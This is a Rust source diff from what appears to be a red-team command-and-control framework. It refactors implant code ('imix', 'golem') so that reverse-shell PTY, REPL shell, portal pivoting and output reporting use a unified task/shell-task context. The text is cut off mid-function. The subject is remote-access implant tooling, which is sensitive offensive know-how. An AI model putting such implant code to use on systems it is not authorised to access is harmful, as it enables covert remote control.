diff --git a/implants/golem/Cargo.toml b/implants/golem/Cargo.toml index 83f32a68c..57aea47fa 100644 --- a/implants/golem/Cargo.toml +++ b/implants/golem/Cargo.toml @@ -13,6 +13,7 @@ rust-embed = { workspace = true } eldritch-core = { workspace = true } eldritch-macros = { workspace = true } eldritch = { workspace = true, features = ["std", "stdlib", "fake_agent"] } +eldritch-agent = { workspace = true } # Need fake here so we import this on its own tokio.workspace = true futures.workspace = true diff --git a/implants/golem/src/main.rs b/implants/golem/src/main.rs index 4fa8205ad..409b94cb1 100644 --- a/implants/golem/src/main.rs +++ b/implants/golem/src/main.rs @@ -9,6 +9,7 @@ use eldritch::assets::{ }; use eldritch::conversion::ToValue; use eldritch::{ForeignValue, Interpreter, StdoutPrinter}; +use eldritch_agent::Context; use pb::c2::TaskContext; use std::collections::BTreeMap; use std::fs; @@ -46,12 +47,12 @@ fn new_runtime(assetlib: impl ForeignValue + 'static) -> Interpreter { task_id: 0, jwt: String::new(), }; - let agent_lib = StdAgentLibrary::new(agent.clone(), task_context.clone()); + let context = Context::Task(task_context); + let agent_lib = StdAgentLibrary::new(agent.clone(), context.clone()); interp.register_lib(agent_lib); - let report_lib = - eldritch::report::std::StdReportLibrary::new(agent.clone(), task_context.clone()); + let report_lib = eldritch::report::std::StdReportLibrary::new(agent.clone(), context.clone()); interp.register_lib(report_lib); - let pivot_lib = eldritch::pivot::std::StdPivotLibrary::new(agent.clone(), task_context.clone()); + let pivot_lib = eldritch::pivot::std::StdPivotLibrary::new(agent.clone(), context.clone()); interp.register_lib(pivot_lib); interp.register_lib(assetlib); interp diff --git a/implants/imix/Cargo.toml b/implants/imix/Cargo.toml index cfc51b504..8ea593d01 100644 --- a/implants/imix/Cargo.toml +++ b/implants/imix/Cargo.toml @@ -35,6 +35,7 @@ crossterm = { workspace = true } prost-types = { workspace = true } pretty_env_logger = { workspace = true } eldritch = { workspace = true, features = ["std", "stdlib"] } +eldritch-agent = { workspace = true } transport = { workspace = true } pb = { workspace = true, features = ["imix"] } portable-pty = { workspace = true } diff --git a/implants/imix/src/agent.rs b/implants/imix/src/agent.rs index a66fe07db..bbed761da 100644 --- a/implants/imix/src/agent.rs +++ b/implants/imix/src/agent.rs @@ -1,8 +1,13 @@ -use anyhow::{Context, Result}; +use anyhow::{Context as AnyhowContext, Result}; use eldritch::agent::agent::Agent; +use eldritch_agent::Context; use pb::c2::host::Platform; use pb::c2::transport::Type; -use pb::c2::{self, ClaimTasksRequest, TaskContext}; +use pb::c2::{ + self, ClaimTasksRequest, ReportOutputRequest, ReportShellTaskOutputMessage, + ReportTaskOutputMessage, ShellTaskContext, ShellTaskOutput, TaskContext, TaskOutput, + report_output_request, +}; use pb::config::Config; use std::collections::{BTreeMap, BTreeSet}; use std::sync::{Arc, Mutex}; @@ -24,8 +29,8 @@ pub struct ImixAgent { runtime_handle: tokio::runtime::Handle, pub task_registry: Arc, pub subtasks: Arc>>>, - pub output_tx: std::sync::mpsc::SyncSender, - pub output_rx: Arc>>, + pub output_tx: std::sync::mpsc::SyncSender, + pub output_rx: Arc>>, pub shell_manager_tx: tokio::sync::mpsc::Sender, } @@ -140,99 +145,99 @@ impl ImixAgent { return; } - let mut merged_task_outputs: BTreeMap = BTreeMap::new(); - let mut merged_shell_outputs: BTreeMap = BTreeMap::new(); + let mut merged_task_outputs: BTreeMap = BTreeMap::new(); + let mut merged_shell_outputs: BTreeMap = + BTreeMap::new(); for output in outputs { - // Handle Task Output - if let Some(new_out) = &output.output { - let task_id = output - .context - .as_ref() - .map(|c| c.task_id) - .unwrap_or_default(); - - use std::collections::btree_map::Entry; - match merged_task_outputs.entry(task_id) { - Entry::Occupied(mut entry) => { - let existing = entry.get_mut(); - if let Some(existing_out) = &mut existing.output { - existing_out.output.push_str(&new_out.output); - match (&mut existing_out.error, &new_out.error) { - (Some(e1), Some(e2)) => e1.msg.push_str(&e2.msg), - (None, Some(e2)) => existing_out.error = Some(e2.clone()), - _ => {} + if let Some(msg) = output.message { + match msg { + report_output_request::Message::TaskOutput(m) => { + if let (Some(ctx), Some(new_out)) = (m.context, m.output) { + let task_id = ctx.task_id; + use std::collections::btree_map::Entry; + match merged_task_outputs.entry(task_id) { + Entry::Occupied(mut entry) => { + let (_, existing_out) = entry.get_mut(); + existing_out.output.push_str(&new_out.output); + match (&mut existing_out.error, &new_out.error) { + (Some(e1), Some(e2)) => e1.msg.push_str(&e2.msg), + (None, Some(e2)) => existing_out.error = Some(e2.clone()), + _ => {} + } + if new_out.exec_finished_at.is_some() { + existing_out.exec_finished_at = + new_out.exec_finished_at.clone(); + } + } + Entry::Vacant(entry) => { + entry.insert((ctx, new_out)); + } } - if new_out.exec_finished_at.is_some() { - existing_out.exec_finished_at = new_out.exec_finished_at.clone(); - } - } else { - existing.output = Some(new_out.clone()); } - existing.context = output.context.clone(); - } - Entry::Vacant(entry) => { - let req = c2::ReportTaskOutputRequest { - output: Some(new_out.clone()), - context: output.context.clone(), - shell_task_output: None, - }; - entry.insert(req); } - } - } - - // Handle Shell Task Output - if let Some(new_shell_out) = &output.shell_task_output { - let shell_task_id = new_shell_out.id; - - use std::collections::btree_map::Entry; - match merged_shell_outputs.entry(shell_task_id) { - Entry::Occupied(mut entry) => { - let existing = entry.get_mut(); - if let Some(existing_out) = &mut existing.shell_task_output { - existing_out.output.push_str(&new_shell_out.output); - match (&mut existing_out.error, &new_shell_out.error) { - (Some(e1), Some(e2)) => e1.msg.push_str(&e2.msg), - (None, Some(e2)) => existing_out.error = Some(e2.clone()), - _ => {} + report_output_request::Message::ShellTaskOutput(m) => { + if let (Some(ctx), Some(new_shell_out)) = (m.context, m.output) { + let shell_task_id = ctx.shell_task_id; + use std::collections::btree_map::Entry; + match merged_shell_outputs.entry(shell_task_id) { + Entry::Occupied(mut entry) => { + let (_, existing_out) = entry.get_mut(); + existing_out.output.push_str(&new_shell_out.output); + match (&mut existing_out.error, &new_shell_out.error) { + (Some(e1), Some(e2)) => e1.msg.push_str(&e2.msg), + (None, Some(e2)) => existing_out.error = Some(e2.clone()), + _ => {} + } + if new_shell_out.exec_finished_at.is_some() { + existing_out.exec_finished_at = + new_shell_out.exec_finished_at.clone(); + } + } + Entry::Vacant(entry) => { + entry.insert((ctx, new_shell_out)); + } } - if new_shell_out.exec_finished_at.is_some() { - existing_out.exec_finished_at = - new_shell_out.exec_finished_at.clone(); - } - } else { - existing.shell_task_output = Some(new_shell_out.clone()); } } - Entry::Vacant(entry) => { - let req = c2::ReportTaskOutputRequest { - output: None, - context: None, - shell_task_output: Some(new_shell_out.clone()), - }; - entry.insert(req); - } } } } let mut transport = self.transport.write().await; - for (_, output) in merged_task_outputs { + for (_, (ctx, output)) in merged_task_outputs { #[cfg(debug_assertions)] log::info!("Task Output: {output:#?}"); - if let Err(_e) = transport.report_task_output(output).await { + let req = ReportOutputRequest { + message: Some(report_output_request::Message::TaskOutput( + ReportTaskOutputMessage { + context: Some(ctx), + output: Some(output), + }, + )), + }; + + if let Err(_e) = transport.report_output(req).await { #[cfg(debug_assertions)] log::error!("Failed to report task output: {_e}"); } } - for (_, output) in merged_shell_outputs { + for (_, (ctx, output)) in merged_shell_outputs { #[cfg(debug_assertions)] log::info!("Shell Task Output: {output:#?}"); - if let Err(_e) = transport.report_task_output(output).await { + let req = ReportOutputRequest { + message: Some(report_output_request::Message::ShellTaskOutput( + ReportShellTaskOutputMessage { + context: Some(ctx), + output: Some(output), + }, + )), + }; + + if let Err(_e) = transport.report_output(req).await { #[cfg(debug_assertions)] log::error!("Failed to report shell task output: {_e}"); } @@ -423,38 +428,46 @@ impl Agent for ImixAgent { self.with_transport(|mut t| async move { t.report_process_list(req).await }) } - fn report_task_output( + fn report_output( &self, - req: c2::ReportTaskOutputRequest, - ) -> Result { + req: c2::ReportOutputRequest, + ) -> Result { // Buffer output instead of sending immediately self.output_tx .try_send(req) .map_err(|_| "Output buffer full".to_string())?; - Ok(c2::ReportTaskOutputResponse {}) + Ok(c2::ReportOutputResponse {}) } - fn start_reverse_shell( - &self, - task_context: TaskContext, - cmd: Option, - ) -> Result<(), String> { - self.spawn_subtask(task_context.task_id, move |transport| async move { - run_reverse_shell_pty(task_context, cmd, transport).await + fn start_reverse_shell(&self, context: Context, cmd: Option) -> Result<(), String> { + let id = match &context { + Context::Task(tc) => tc.task_id, + Context::ShellTask(stc) => stc.shell_task_id, + }; + self.spawn_subtask(id, move |transport| async move { + run_reverse_shell_pty(context, cmd, transport).await }) } - fn create_portal(&self, task_context: TaskContext) -> Result<(), String> { + fn create_portal(&self, context: Context) -> Result<(), String> { let shell_manager_tx = self.shell_manager_tx.clone(); - self.spawn_subtask(task_context.task_id, move |transport| async move { - run_create_portal(task_context, transport, shell_manager_tx).await + let id = match &context { + Context::Task(tc) => tc.task_id, + Context::ShellTask(stc) => stc.shell_task_id, + }; + self.spawn_subtask(id, move |transport| async move { + run_create_portal(context, transport, shell_manager_tx).await }) } - fn start_repl_reverse_shell(&self, task_context: TaskContext) -> Result<(), String> { + fn start_repl_reverse_shell(&self, context: Context) -> Result<(), String> { let agent = self.clone(); - self.spawn_subtask(task_context.task_id, move |transport| async move { - run_repl_reverse_shell(task_context, transport, agent).await + let id = match &context { + Context::Task(tc) => tc.task_id, + Context::ShellTask(stc) => stc.shell_task_id, + }; + self.spawn_subtask(id, move |transport| async move { + run_repl_reverse_shell(context, transport, agent).await }) } diff --git a/implants/imix/src/portal/mod.rs b/implants/imix/src/portal/mod.rs index de68fe204..2e8ade6e8 100644 --- a/implants/imix/src/portal/mod.rs +++ b/implants/imix/src/portal/mod.rs @@ -1,6 +1,6 @@ use crate::shell::manager::ShellManagerMessage; use anyhow::Result; -use pb::c2::TaskContext; +use eldritch_agent::Context; use tokio::sync::mpsc; use transport::Transport; @@ -10,9 +10,9 @@ pub mod tcp; pub mod udp; pub async fn run_create_portal( - task_context: TaskContext, + context: Context, transport: T, shell_manager_tx: mpsc::Sender, ) -> Result<()> { - run::run(task_context, transport, shell_manager_tx).await + run::run(context, transport, shell_manager_tx).await } diff --git a/implants/imix/src/portal/run.rs b/implants/imix/src/portal/run.rs index e5e416a99..8b5eab7f7 100644 --- a/implants/imix/src/portal/run.rs +++ b/implants/imix/src/portal/run.rs @@ -1,5 +1,6 @@ use anyhow::Result; -use pb::c2::{CreatePortalRequest, CreatePortalResponse, TaskContext}; +use eldritch_agent::Context; +use pb::c2::{CreatePortalRequest, CreatePortalResponse, create_portal_request}; use pb::portal::{BytesPayloadKind, Mote, mote::Payload}; use pb::trace::{TraceData, TraceEvent, TraceEventKind}; use portal_stream::{OrderedReader, PayloadSequencer}; @@ -20,7 +21,7 @@ struct StreamContext { } pub async fn run( - task_context: TaskContext, + context: Context, mut transport: T, shell_manager_tx: mpsc::Sender, ) -> Result<()> { @@ -48,10 +49,17 @@ pub async fn run( // Channel for handler tasks to send outgoing motes back to main loop let (out_tx, mut out_rx) = mpsc::channel::(100); + let context_val = match &context { + Context::Task(tc) => Some(create_portal_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => Some(create_portal_request::Context::ShellTaskContext( + stc.clone(), + )), + }; + // Send initial registration message if let Err(_e) = req_tx .send(CreatePortalRequest { - context: Some(task_context.clone()), + context: context_val.clone(), mote: None, }) .await @@ -90,8 +98,14 @@ pub async fn run( msg = out_rx.recv() => { match msg { Some(mote) => { + let context_val = match &context { + Context::Task(tc) => Some(create_portal_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => { + Some(create_portal_request::Context::ShellTaskContext(stc.clone())) + } + }; let req = CreatePortalRequest { - context: Some(task_context.clone()), + context: context_val, mote: Some(mote), }; if let Err(_e) = req_tx.send(req).await { diff --git a/implants/imix/src/shell/manager.rs b/implants/imix/src/shell/manager.rs index 48d92a14e..ba30e2b35 100644 --- a/implants/imix/src/shell/manager.rs +++ b/implants/imix/src/shell/manager.rs @@ -8,7 +8,11 @@ use tokio::sync::mpsc; use eldritch::agent::agent::Agent; use eldritch::assets::std::EmptyAssets; use eldritch::{Interpreter, Printer, Span, Value}; -use pb::c2::{ReportTaskOutputRequest, ShellTask, ShellTaskOutput, TaskContext, TaskError}; +use eldritch_agent::Context; +use pb::c2::{ + ReportOutputRequest, ReportShellTaskOutputMessage, ShellTask, ShellTaskContext, + ShellTaskOutput, TaskError, report_output_request, +}; use pb::portal::{self, Mote, ShellPayload}; use transport::Transport; @@ -24,7 +28,7 @@ pub enum ShellManagerMessage { #[derive(Clone)] pub enum ExecutionContext { - Task(i64), // We only need task_id here. stream_id and seq_id are unused for C2 reporting. + ShellTask(ShellTaskContext), Portal { tx: mpsc::Sender, stream_id: String, @@ -41,28 +45,39 @@ fn dispatch_output( is_error: bool, ) { match context { - ExecutionContext::Task(task_id) => { - let req = ReportTaskOutputRequest { - shell_task_output: Some(ShellTaskOutput { - id: *task_id, - output: if is_error { - String::new() - } else { - output.clone() - }, - error: if is_error { - Some(TaskError { msg: output }) - } else { - None + ExecutionContext::ShellTask(stc) => { + let task_error = if is_error { + Some(TaskError { + msg: output.clone(), + }) + } else { + None + }; + + let output_msg = ShellTaskOutput { + id: stc.shell_task_id, + output: if is_error { String::new() } else { output }, + error: task_error, + exec_started_at: None, + exec_finished_at: None, + }; + + let req = ReportOutputRequest { + message: Some(report_output_request::Message::ShellTaskOutput( + ReportShellTaskOutputMessage { + context: Some(stc.clone()), + output: Some(output_msg), }, - exec_started_at: None, - exec_finished_at: None, - }), - ..Default::default() + )), }; - if let Err(e) = agent.report_task_output(req) { + + if let Err(e) = agent.report_output(req) { #[cfg(debug_assertions)] - log::error!("Failed to report shell task output {}: {}", task_id, e); + log::error!( + "Failed to report shell task output {}: {}", + stc.shell_task_id, + e + ); } } ExecutionContext::Portal { @@ -124,6 +139,7 @@ impl Printer for ShellPrinter { pub enum InterpreterCommand { ExecuteTask { task_id: i64, + jwt: String, input: String, }, ExecutePortal { @@ -180,6 +196,7 @@ impl ShellManager { .tx .send(InterpreterCommand::ExecuteTask { task_id: task.id, + jwt: task.jwt, input: task.input, }) .await; @@ -234,20 +251,38 @@ impl ShellManager { context: context.clone(), }); - let task_context = TaskContext { - task_id: 0, + let shell_task_context = ShellTaskContext { + shell_task_id: 0, jwt: String::new(), }; let backend = Arc::new(EmptyAssets {}); let mut interpreter = Interpreter::new_with_printer(printer) .with_default_libs() - .with_task_context(agent.clone(), task_context, Vec::new(), backend); + .with_context( + agent.clone(), + Context::ShellTask(shell_task_context), + Vec::new(), + backend, + ); while let Some(cmd) = rx.blocking_recv() { match cmd { - InterpreterCommand::ExecuteTask { task_id, input, .. } => { - *context.lock().unwrap() = ExecutionContext::Task(task_id); + InterpreterCommand::ExecuteTask { + task_id, + jwt, + input, + } => { + let stc = ShellTaskContext { + shell_task_id: task_id, + jwt, + }; + *context.lock().unwrap() = ExecutionContext::ShellTask(stc.clone()); + + let ctx = Context::ShellTask(stc); + let backend = Arc::new(EmptyAssets {}); + interpreter = interpreter.with_context(agent.clone(), ctx, Vec::new(), backend); + Self::execute_interpret(&mut interpreter, &input, &agent, &context, shell_id); *context.lock().unwrap() = ExecutionContext::None; } @@ -262,6 +297,14 @@ impl ShellManager { stream_id, seq_id, }; + // Portal execution doesn't have a task context really, or it inherits previous? + // We might want to clear context or use a dummy one. + // For now keeping what it was (could be previous task's context or default). + // This might be risky if code uses context (e.g. reporting credential). + // Ideally Portal requests should carry context if they are to report C2 data. + // But `ExecutePortal` implies executing shell command from Portal. + // We'll proceed as is. + Self::execute_interpret(&mut interpreter, &input, &agent, &context, shell_id); *context.lock().unwrap() = ExecutionContext::None; } @@ -332,7 +375,7 @@ impl ShellManager { mod tests { use super::*; use crate::task::TaskRegistry; - use pb::c2::{ReportTaskOutputResponse, ShellTask}; + use pb::c2::{ReportOutputResponse, ShellTask}; use pb::config::Config; use transport::MockTransport; @@ -343,18 +386,19 @@ mod tests { let config = Config::default(); let mut transport = MockTransport::default(); - // We expect report_task_output to be called with the result "2\n" for input "1+1" + // We expect report_output to be called with the result "2\n" for input "1+1" transport - .expect_report_task_output() + .expect_report_output() .withf(|req| { - if let Some(out) = &req.shell_task_output { - out.output.contains("2") - } else { - false + if let Some(report_output_request::Message::ShellTaskOutput(m)) = &req.message { + if let Some(out) = &m.output { + return out.output.contains("2"); + } } + false }) .times(1) - .returning(|_| Ok(ReportTaskOutputResponse::default())); + .returning(|_| Ok(ReportOutputResponse::default())); let task_registry = Arc::new(TaskRegistry::new()); @@ -375,6 +419,7 @@ mod tests { input: "1+1".to_string(), sequence_id: 1, stream_id: "stream1".to_string(), + jwt: "test".to_string(), }; // Send task diff --git a/implants/imix/src/shell/pty.rs b/implants/imix/src/shell/pty.rs index e9ea73dd4..d82b0f739 100644 --- a/implants/imix/src/shell/pty.rs +++ b/implants/imix/src/shell/pty.rs @@ -1,5 +1,6 @@ use anyhow::Result; -use pb::c2::{ReverseShellMessageKind, ReverseShellRequest, TaskContext}; +use eldritch_agent::Context; +use pb::c2::{ReverseShellMessageKind, ReverseShellRequest, reverse_shell_request}; use portable_pty::{CommandBuilder, PtySize, native_pty_system}; use std::io::{Read, Write}; use transport::Transport; @@ -8,7 +9,7 @@ use transport::Transport; use std::path::Path; pub async fn run_reverse_shell_pty( - task_context: TaskContext, + context: Context, cmd: Option, mut transport: T, ) -> Result<()> { @@ -19,15 +20,19 @@ pub async fn run_reverse_shell_pty( let (internal_exit_tx, mut internal_exit_rx) = tokio::sync::mpsc::channel(1); #[cfg(debug_assertions)] - log::info!( - "starting reverse_shell_pty (task_id={0})", - task_context.clone().task_id - ); + log::info!("starting reverse_shell_pty (context={:?})", context); + + let context_val = match &context { + Context::Task(tc) => Some(reverse_shell_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => Some(reverse_shell_request::Context::ShellTaskContext( + stc.clone(), + )), + }; // First, send an initial registration message if let Err(_err) = output_tx .send(ReverseShellRequest { - context: Some(task_context.clone()), + context: context_val.clone(), kind: ReverseShellMessageKind::Ping.into(), data: Vec::new(), }) @@ -93,7 +98,7 @@ pub async fn run_reverse_shell_pty( // Spawn task to send PTY output const CHUNK_SIZE: usize = 1024; let output_tx_clone = output_tx.clone(); - let task_context_clone = task_context.clone(); + let context_val_clone = context_val.clone(); tokio::spawn(async move { loop { let mut buffer = [0; CHUNK_SIZE]; @@ -124,7 +129,7 @@ pub async fn run_reverse_shell_pty( if let Err(_err) = output_tx_clone .send(ReverseShellRequest { - context: Some(task_context_clone.clone()), + context: context_val_clone.clone(), kind: ReverseShellMessageKind::Data.into(), data: buffer[..n].to_vec(), }) @@ -138,7 +143,7 @@ pub async fn run_reverse_shell_pty( // Ping to flush if let Err(_err) = output_tx_clone .send(ReverseShellRequest { - context: Some(task_context_clone.clone()), + context: context_val_clone.clone(), kind: ReverseShellMessageKind::Ping.into(), data: Vec::new(), }) @@ -165,12 +170,12 @@ pub async fn run_reverse_shell_pty( break; } - let task_context_clone = task_context.clone(); + let context_val_clone = context_val.clone(); if let Some(msg) = input_rx.recv().await { if msg.kind == ReverseShellMessageKind::Ping as i32 { if let Err(_err) = output_tx .send(ReverseShellRequest { - context: Some(task_context_clone), + context: context_val_clone, kind: ReverseShellMessageKind::Ping.into(), data: msg.data, }) @@ -197,9 +202,6 @@ pub async fn run_reverse_shell_pty( } #[cfg(debug_assertions)] - log::info!( - "stopping reverse_shell_pty (task_id={0})", - task_context.clone().task_id - ); + log::info!("stopping reverse_shell_pty"); Ok(()) } diff --git a/implants/imix/src/shell/repl.rs b/implants/imix/src/shell/repl.rs index 36986a4ec..927fb47ed 100644 --- a/implants/imix/src/shell/repl.rs +++ b/implants/imix/src/shell/repl.rs @@ -1,41 +1,127 @@ -use anyhow::Result; +use std::io::{BufWriter, Write}; +use std::sync::Arc; + +use crate::agent::ImixAgent; use crossterm::{QueueableCommand, cursor, terminal}; use eldritch::agent::agent::Agent; use eldritch::assets::std::EmptyAssets; use eldritch::repl::{Repl, ReplAction}; -use eldritch::{Interpreter, Value}; +use eldritch::{Interpreter, Printer, Span, Value}; use pb::c2::{ - ReportTaskOutputRequest, ReverseShellMessageKind, ReverseShellRequest, ReverseShellResponse, - TaskContext, TaskError, TaskOutput, + ReportOutputRequest, ReportShellTaskOutputMessage, ReportTaskOutputMessage, + ReverseShellMessageKind, ReverseShellRequest, ShellTaskOutput, TaskError, TaskOutput, + report_output_request, reverse_shell_request, }; -use std::io::{BufWriter, Write}; -use std::sync::Arc; use transport::Transport; -use crate::agent::ImixAgent; -use crate::printer::StreamPrinter; -use crate::shell::parser::InputParser; -use crate::shell::terminal::{VtWriter, render}; +use eldritch_agent::Context; + +use super::parser::InputParser; + +struct VtWriter { + tx: tokio::sync::mpsc::Sender, + context: Context, + _phantom: std::marker::PhantomData, +} + +impl Write for VtWriter { + fn write(&mut self, buf: &[u8]) -> std::io::Result { + let context_val = match &self.context { + Context::Task(tc) => Some(reverse_shell_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => Some(reverse_shell_request::Context::ShellTaskContext( + stc.clone(), + )), + }; + + let _ = self.tx.blocking_send(ReverseShellRequest { + context: context_val, + kind: ReverseShellMessageKind::Data.into(), + data: buf.to_vec(), + }); + Ok(buf.len()) + } + + fn flush(&mut self) -> std::io::Result<()> { + Ok(()) + } +} + +// Custom printer that sends output to channels instead of stdout/stderr +#[derive(Debug)] +struct StreamPrinter { + out_tx: tokio::sync::mpsc::UnboundedSender, + err_tx: tokio::sync::mpsc::UnboundedSender, +} + +impl StreamPrinter { + fn new( + out_tx: tokio::sync::mpsc::UnboundedSender, + err_tx: tokio::sync::mpsc::UnboundedSender, + ) -> Self { + Self { out_tx, err_tx } + } +} + +impl Printer for StreamPrinter { + fn print_out(&self, _span: &Span, s: &str) { + let _ = self.out_tx.send(format!("{}\n", s)); + } + + fn print_err(&self, _span: &Span, s: &str) { + let _ = self.err_tx.send(s.to_string()); + } +} + +fn render( + writer: &mut W, + repl: &Repl, + previous_buffer: Option<&str>, +) -> std::io::Result<()> { + // Basic rendering implementation + // This is simplified and assumes vt100 compatibility on the other end + + // If we have a previous buffer, clear the line + if let Some(_prev) = previous_buffer { + writer.queue(terminal::Clear(terminal::ClearType::CurrentLine))?; + writer.queue(cursor::MoveToColumn(0))?; + } + + let state = repl.get_render_state(); + let prompt = ">>> "; + writer.write_all(prompt.as_bytes())?; + writer.write_all(state.buffer.as_bytes())?; + + // Move cursor to correct position + let cursor_pos = prompt.len() + state.cursor; + writer.queue(cursor::MoveToColumn(cursor_pos as u16))?; + + writer.flush()?; + Ok(()) +} pub async fn run_repl_reverse_shell( - task_context: TaskContext, + context: Context, mut transport: T, agent: ImixAgent, -) -> Result<()> { +) -> anyhow::Result<()> { // Channels to manage gRPC stream - let (output_tx, output_rx) = tokio::sync::mpsc::channel(1); - let (input_tx, input_rx) = tokio::sync::mpsc::channel(1); + let (output_tx, output_rx) = tokio::sync::mpsc::channel(100); + let (input_tx, mut input_rx) = tokio::sync::mpsc::channel(100); #[cfg(debug_assertions)] - log::info!( - "starting repl_reverse_shell (task_id={0})", - task_context.task_id - ); + log::info!("starting repl_reverse_shell (context={:?})", context); - // Initial Registration + let context_val = match &context { + Context::Task(tc) => Some(reverse_shell_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => Some(reverse_shell_request::Context::ShellTaskContext( + stc.clone(), + )), + }; + + // First, send an initial registration message if let Err(_err) = output_tx .send(ReverseShellRequest { - context: Some(task_context.clone()), + context: context_val.clone(), kind: ReverseShellMessageKind::Ping.into(), data: Vec::new(), }) @@ -46,19 +132,10 @@ pub async fn run_repl_reverse_shell( } // Initiate gRPC stream - transport.reverse_shell(output_rx, input_tx).await?; - - // Move logic to blocking thread - run_repl_loop(task_context, input_rx, output_tx, agent).await; - Ok(()) -} + if let Err(e) = transport.reverse_shell(output_rx, input_tx).await { + return Err(e); + } -async fn run_repl_loop( - task_context: TaskContext, - mut input_rx: tokio::sync::mpsc::Receiver, - output_tx: tokio::sync::mpsc::Sender, - agent: ImixAgent, -) { let runtime = tokio::runtime::Handle::current(); let _ = tokio::task::spawn_blocking(move || { let (out_tx, mut out_rx) = tokio::sync::mpsc::unbounded_channel(); @@ -67,7 +144,7 @@ async fn run_repl_loop( let consumer_output_tx = output_tx.clone(); let consumer_agent = agent.clone(); - let consumer_context = task_context.clone(); + let consumer_context = context.clone(); runtime.spawn(async move { let mut out_open = true; @@ -80,25 +157,51 @@ async fn run_repl_loop( Some(msg) => { // Send to REPL let s_crlf = msg.replace('\n', "\r\n"); + let context_val = match &consumer_context { + Context::Task(tc) => Some(reverse_shell_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => Some(reverse_shell_request::Context::ShellTaskContext(stc.clone())), + }; let _ = consumer_output_tx .send(ReverseShellRequest { - context: Some(consumer_context.clone()), + context: context_val, kind: ReverseShellMessageKind::Data.into(), data: s_crlf.into_bytes(), }) .await; // Report Task Output - let _ = consumer_agent.report_task_output(ReportTaskOutputRequest { - output: Some(TaskOutput { - id: consumer_context.task_id, - output: msg, - error: None, - exec_started_at: None, - exec_finished_at: None, - }), - context: Some(consumer_context.clone()), - shell_task_output: None, + let task_error = None; + let message_val = match &consumer_context { + Context::Task(tc) => { + let output_msg = TaskOutput { + id: tc.task_id, + output: msg, + error: task_error, + exec_started_at: None, + exec_finished_at: None, + }; + Some(report_output_request::Message::TaskOutput(ReportTaskOutputMessage { + context: Some(tc.clone()), + output: Some(output_msg), + })) + }, + Context::ShellTask(stc) => { + let output_msg = ShellTaskOutput { + id: stc.shell_task_id, + output: msg, + error: task_error, + exec_started_at: None, + exec_finished_at: None, + }; + Some(report_output_request::Message::ShellTaskOutput(ReportShellTaskOutputMessage { + context: Some(stc.clone()), + output: Some(output_msg), + })) + } + }; + + let _ = consumer_agent.report_output(ReportOutputRequest { + message: message_val, }); } None => { @@ -111,25 +214,51 @@ async fn run_repl_loop( Some(msg) => { // Send to REPL let s_crlf = msg.replace('\n', "\r\n"); + let context_val = match &consumer_context { + Context::Task(tc) => Some(reverse_shell_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => Some(reverse_shell_request::Context::ShellTaskContext(stc.clone())), + }; let _ = consumer_output_tx .send(ReverseShellRequest { - context: Some(consumer_context.clone()), + context: context_val, kind: ReverseShellMessageKind::Data.into(), data: s_crlf.into_bytes(), }) .await; // Report Task Output - let _ = consumer_agent.report_task_output(ReportTaskOutputRequest { - output: Some(TaskOutput { - id: consumer_context.task_id, - output: String::new(), - error: Some(TaskError { msg }), - exec_started_at: None, - exec_finished_at: None, - }), - context: Some(consumer_context.clone()), - shell_task_output: None, + let task_error = Some(TaskError { msg }); + let message_val = match &consumer_context { + Context::Task(tc) => { + let output_msg = TaskOutput { + id: tc.task_id, + output: String::new(), + error: task_error, + exec_started_at: None, + exec_finished_at: None, + }; + Some(report_output_request::Message::TaskOutput(ReportTaskOutputMessage { + context: Some(tc.clone()), + output: Some(output_msg), + })) + }, + Context::ShellTask(stc) => { + let output_msg = ShellTaskOutput { + id: stc.shell_task_id, + output: String::new(), + error: task_error, + exec_started_at: None, + exec_finished_at: None, + }; + Some(report_output_request::Message::ShellTaskOutput(ReportShellTaskOutputMessage { + context: Some(stc.clone()), + output: Some(output_msg), + })) + } + }; + + let _ = consumer_agent.report_output(ReportOutputRequest { + message: message_val, }); } None => { @@ -148,12 +277,13 @@ async fn run_repl_loop( let backend = Arc::new(EmptyAssets {}); let mut interpreter = Interpreter::new_with_printer(printer) .with_default_libs() - .with_task_context(Arc::new(agent), task_context.clone(), Vec::new(), backend); + .with_context(Arc::new(agent), context.clone(), Vec::new(), backend); // Changed to with_context let mut repl = Repl::new(); - let stdout = VtWriter { + let stdout = VtWriter:: { tx: output_tx.clone(), - task_context: task_context.clone(), + context: context.clone(), + _phantom: std::marker::PhantomData, }; let mut stdout = BufWriter::new(stdout); @@ -165,8 +295,12 @@ async fn run_repl_loop( while let Some(msg) = input_rx.blocking_recv() { if msg.kind == ReverseShellMessageKind::Ping as i32 { + let context_val = match &context { + Context::Task(tc) => Some(reverse_shell_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => Some(reverse_shell_request::Context::ShellTaskContext(stc.clone())), + }; let _ = output_tx.blocking_send(ReverseShellRequest { - context: Some(task_context.clone()), + context: context_val, kind: ReverseShellMessageKind::Ping.into(), data: msg.data, }); @@ -258,4 +392,5 @@ async fn run_repl_loop( } }) .await; + Ok(()) } diff --git a/implants/imix/src/shell/terminal.rs b/implants/imix/src/shell/terminal.rs index d2cbadf41..60c91e465 100644 --- a/implants/imix/src/shell/terminal.rs +++ b/implants/imix/src/shell/terminal.rs @@ -4,18 +4,27 @@ use crossterm::{ terminal, }; use eldritch::repl::Repl; -use pb::c2::{ReverseShellMessageKind, ReverseShellRequest, TaskContext}; +use eldritch_agent::Context; +use pb::c2::{ReverseShellMessageKind, ReverseShellRequest, reverse_shell_request}; pub struct VtWriter { pub tx: tokio::sync::mpsc::Sender, - pub task_context: TaskContext, + pub context: Context, } impl std::io::Write for VtWriter { fn write(&mut self, buf: &[u8]) -> std::io::Result { let data = buf.to_vec(); + + let context_val = match &self.context { + Context::Task(tc) => Some(reverse_shell_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => Some(reverse_shell_request::Context::ShellTaskContext( + stc.clone(), + )), + }; + match self.tx.blocking_send(ReverseShellRequest { - context: Some(self.task_context.clone()), + context: context_val, kind: ReverseShellMessageKind::Data.into(), data, }) { @@ -25,8 +34,15 @@ impl std::io::Write for VtWriter { } fn flush(&mut self) -> std::io::Result<()> { + let context_val = match &self.context { + Context::Task(tc) => Some(reverse_shell_request::Context::TaskContext(tc.clone())), + Context::ShellTask(stc) => 